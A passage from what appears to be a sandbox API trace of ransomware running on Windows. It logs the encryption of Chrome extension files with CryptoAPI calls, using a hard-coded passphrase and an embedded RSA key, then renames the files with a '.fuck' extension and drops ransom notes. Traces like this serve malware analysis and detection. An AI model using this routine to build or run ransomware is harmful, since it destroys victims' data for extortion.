lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0249.796] ReadFile (in: hFile=0x5d58, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0249.796] CryptEncrypt (in: hKey=0x29374f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9bff8*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9bff8*=0x380) returned 1 [0249.796] WriteFile (in: hFile=0x5d54, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0249.797] ReadFile (in: hFile=0x5d58, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9bff8*=0x156, lpOverlapped=0x0) returned 1 [0249.797] CryptEncrypt (in: hKey=0x29374f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9bff8*=0x156, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9bff8*=0x160) returned 1 [0249.797] WriteFile (in: hFile=0x5d54, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x160, lpNumberOfBytesWritten=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9bff8*=0x160, lpOverlapped=0x0) returned 1 [0249.797] CloseHandle (hObject=0x5d58) returned 1 [0249.797] CloseHandle (hObject=0x5d54) returned 1 [0249.797] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_metadata\\verified_contents.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_metadata\\verified_contents.json.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_metadata\\verified_contents.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_metadata\\verified_contents.json"), bFailIfExists=0) returned 1 [0249.802] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_metadata\\verified_contents.json", dwFileAttributes=0x0) returned 1 [0249.803] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_metadata\\verified_contents.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_metadata\\verified_contents.json.gsg")) returned 1 [0249.805] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_metadata\\verified_contents.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_metadata\\verified_contents.json"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_metadata\\verified_contents.json.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_metadata\\verified_contents.json.fuck")) returned 1 [0249.806] CryptDestroyHash (hHash=0x2938978) returned 1 [0249.806] CryptDestroyKey (hKey=0x29374f8) returned 1 [0249.806] CryptReleaseContext (hProv=0x293d678, dwFlags=0x0) returned 1 [0249.806] FindNextFileA (in: hFindFile=0x29387f8, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 0 [0249.806] FindClose (in: hFindFile=0x29387f8 | out: hFindFile=0x29387f8) returned 1 [0249.806] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_metadata\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_metadata\\readme_back_files.htm")) returned 0xffffffff [0249.806] AreFileApisANSI () returned 1 [0249.806] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e33b8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 151 [0249.807] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_metadata\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_metadata\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9d268, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d50 [0249.807] GetFileType (hFile=0x5d50) returned 0x1 [0249.807] WriteFile (in: hFile=0x5d50, lpBuffer=0x2b9beb4*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9beac, lpOverlapped=0x0 | out: lpBuffer=0x2b9beb4*, lpNumberOfBytesWritten=0x2b9beac*=0x5ec, lpOverlapped=0x0) returned 1 [0249.809] FindNextFileA (in: hFindFile=0x29387b8, lpFindFileData=0x2b9d480 | out: lpFindFileData=0x2b9d480) returned 0 [0249.809] FindClose (in: hFindFile=0x29387b8 | out: hFindFile=0x29387b8) returned 1 [0249.809] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\readme_back_files.htm")) returned 0xffffffff [0249.809] AreFileApisANSI () returned 1 [0249.809] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x296d240, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 141 [0249.809] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9d604, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d4c [0249.810] GetFileType (hFile=0x5d4c) returned 0x1 [0249.811] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2b9c250*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9c248, lpOverlapped=0x0 | out: lpBuffer=0x2b9c250*, lpNumberOfBytesWritten=0x2b9c248*=0x5ec, lpOverlapped=0x0) returned 1 [0249.812] FindNextFileA (in: hFindFile=0x29384f8, lpFindFileData=0x2b9d81c | out: lpFindFileData=0x2b9d81c) returned 0 [0249.812] FindClose (in: hFindFile=0x29384f8 | out: hFindFile=0x29384f8) returned 1 [0249.813] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\readme_back_files.htm")) returned 0xffffffff [0249.813] AreFileApisANSI () returned 1 [0249.813] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x296d240, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 135 [0249.813] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9d9a0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d40 [0249.815] GetFileType (hFile=0x5d40) returned 0x1 [0249.815] WriteFile (in: hFile=0x5d40, lpBuffer=0x2b9c5ec*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9c5e4, lpOverlapped=0x0 | out: lpBuffer=0x2b9c5ec*, lpNumberOfBytesWritten=0x2b9c5e4*=0x5ec, lpOverlapped=0x0) returned 1 [0249.833] FindNextFileA (in: hFindFile=0x29388b8, lpFindFileData=0x2b9dbb8 | out: lpFindFileData=0x2b9dbb8) returned 1 [0249.833] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\*.*", lpFindFileData=0x2b9d81c | out: lpFindFileData=0x2b9d81c) returned 0x29384f8 [0249.835] FindNextFileA (in: hFindFile=0x29384f8, lpFindFileData=0x2b9d81c | out: lpFindFileData=0x2b9d81c) returned 1 [0249.836] FindNextFileA (in: hFindFile=0x29384f8, lpFindFileData=0x2b9d81c | out: lpFindFileData=0x2b9d81c) returned 1 [0249.836] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\*.*", lpFindFileData=0x2b9d480 | out: lpFindFileData=0x2b9d480) returned 0x29385b8 [0249.883] FindNextFileA (in: hFindFile=0x29385b8, lpFindFileData=0x2b9d480 | out: lpFindFileData=0x2b9d480) returned 1 [0249.884] FindNextFileA (in: hFindFile=0x29385b8, lpFindFileData=0x2b9d480 | out: lpFindFileData=0x2b9d480) returned 1 [0249.884] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9d390 | out: lpSystemTimeAsFileTime=0x2b9d390) [0249.887] GetLastError () returned 0x0 [0249.887] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\128.png" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\128.png")) returned 0x20 [0249.890] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\128.png", dwFileAttributes=0x80) returned 1 [0249.891] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\128.png" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\128.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d50 [0249.892] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\128.png.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\128.png.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d54 [0249.892] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\128.png.gsg", dwFileAttributes=0x2) returned 1 [0249.893] CryptAcquireContextA (in: phProv=0x2b9c38c, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9c38c*=0x293dbc8) returned 1 [0249.896] CryptCreateHash (in: hProv=0x293dbc8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9c390 | out: phHash=0x2b9c390) returned 1 [0249.896] lstrlenA (lpString="dKFUHQAZHTBtFXQUaXBopKFNzMlQm") returned 29 [0249.896] CryptHashData (hHash=0x29387b8, pbData=0x28cb558, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0249.896] CryptDeriveKey (in: hProv=0x293dbc8, Algid=0x6610, hBaseData=0x29387b8, dwFlags=0x1000000, phKey=0x2b9c37c | out: phKey=0x2b9c37c*=0x29387f8) returned 1 [0249.896] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----h", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9c398, pcbBinary=0x2b9c378, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9c398, pcbBinary=0x2b9c378, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0249.896] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9c398, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9c36c, pcbStructInfo=0x2b9c374 | out: pvStructInfo=0x2b9c36c, pcbStructInfo=0x2b9c374) returned 1 [0249.896] CryptAcquireContextA (in: phProv=0x2b9c388, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9c388*=0x29403a0) returned 1 [0249.898] CryptImportPublicKeyInfo (in: hCryptProv=0x29403a0, dwCertEncodingType=0x1, pInfo=0x2933220*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2933250*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2933258*, PublicKey.cUnusedBits=0x0), phKey=0x2b9c380 | out: phKey=0x2b9c380*=0x29374f8) returned 1 [0249.898] CryptEncrypt (in: hKey=0x29374f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9c370*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9c370*=0x80) returned 1 [0249.898] CryptEncrypt (in: hKey=0x29374f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x29405c0*, pdwDataLen=0x2b9c384*=0x18, dwBufLen=0x80 | out: pbData=0x29405c0*, pdwDataLen=0x2b9c384*=0x80) returned 1 [0249.898] WriteFile (in: hFile=0x5d54, lpBuffer=0x29405c0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x29405c0*, lpNumberOfBytesWritten=0x2b9c394*=0x80, lpOverlapped=0x0) returned 1 [0249.900] ReadFile (in: hFile=0x5d50, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0249.923] CryptEncrypt (in: hKey=0x29387f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0249.924] WriteFile (in: hFile=0x5d54, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0249.934] ReadFile (in: hFile=0x5d50, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0249.934] CryptEncrypt (in: hKey=0x29387f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0249.934] WriteFile (in: hFile=0x5d54, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0249.934] ReadFile (in: hFile=0x5d50, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0249.934] CryptEncrypt (in: hKey=0x29387f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0249.934] WriteFile (in: hFile=0x5d54, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0249.934] ReadFile (in: hFile=0x5d50, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0249.935] CryptEncrypt (in: hKey=0x29387f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0249.935] WriteFile (in: hFile=0x5d54, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0249.935] ReadFile (in: hFile=0x5d50, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0249.935] CryptEncrypt (in: hKey=0x29387f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0249.935] WriteFile (in: hFile=0x5d54, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0249.935] ReadFile (in: hFile=0x5d50, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0249.935] CryptEncrypt (in: hKey=0x29387f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0249.935] WriteFile (in: hFile=0x5d54, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0249.935] ReadFile (in: hFile=0x5d50, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0249.935] CryptEncrypt (in: hKey=0x29387f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0249.935] WriteFile (in: hFile=0x5d54, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0249.935] ReadFile (in: hFile=0x5d50, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9c394*=0x1b3, lpOverlapped=0x0) returned 1 [0249.935] CryptEncrypt (in: hKey=0x29387f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9c394*=0x1b3, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9c394*=0x1c0) returned 1 [0249.935] WriteFile (in: hFile=0x5d54, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x1c0, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9c394*=0x1c0, lpOverlapped=0x0) returned 1 [0249.936] CloseHandle (hObject=0x5d50) returned 1 [0249.936] CloseHandle (hObject=0x5d54) returned 1 [0249.936] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\128.png.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\128.png.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\128.png" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\128.png"), bFailIfExists=0) returned 1 [0249.938] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\128.png", dwFileAttributes=0x0) returned 1 [0249.939] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\128.png.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\128.png.gsg")) returned 1 [0249.940] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\128.png" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\128.png"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\128.png.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\128.png.fuck")) returned 1 [0249.941] CryptDestroyHash (hHash=0x29387b8) returned 1 [0249.941] CryptDestroyKey (hKey=0x29387f8) returned 1 [0249.941] CryptReleaseContext (hProv=0x293dbc8, dwFlags=0x0) returned 1 [0249.941] FindNextFileA (in: hFindFile=0x29385b8, lpFindFileData=0x2b9d480 | out: lpFindFileData=0x2b9d480) returned 1 [0249.941] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9d390 | out: lpSystemTimeAsFileTime=0x2b9d390) [0249.941] GetLastError () returned 0x0 [0249.941] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\manifest.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\manifest.json")) returned 0x20 [0249.942] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\manifest.json", dwFileAttributes=0x80) returned 1 [0249.942] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\manifest.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\manifest.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d54 [0249.942] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\manifest.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\manifest.json.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d50 [0249.943] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\manifest.json.gsg", dwFileAttributes=0x2) returned 1 [0249.943] CryptAcquireContextA (in: phProv=0x2b9c38c, 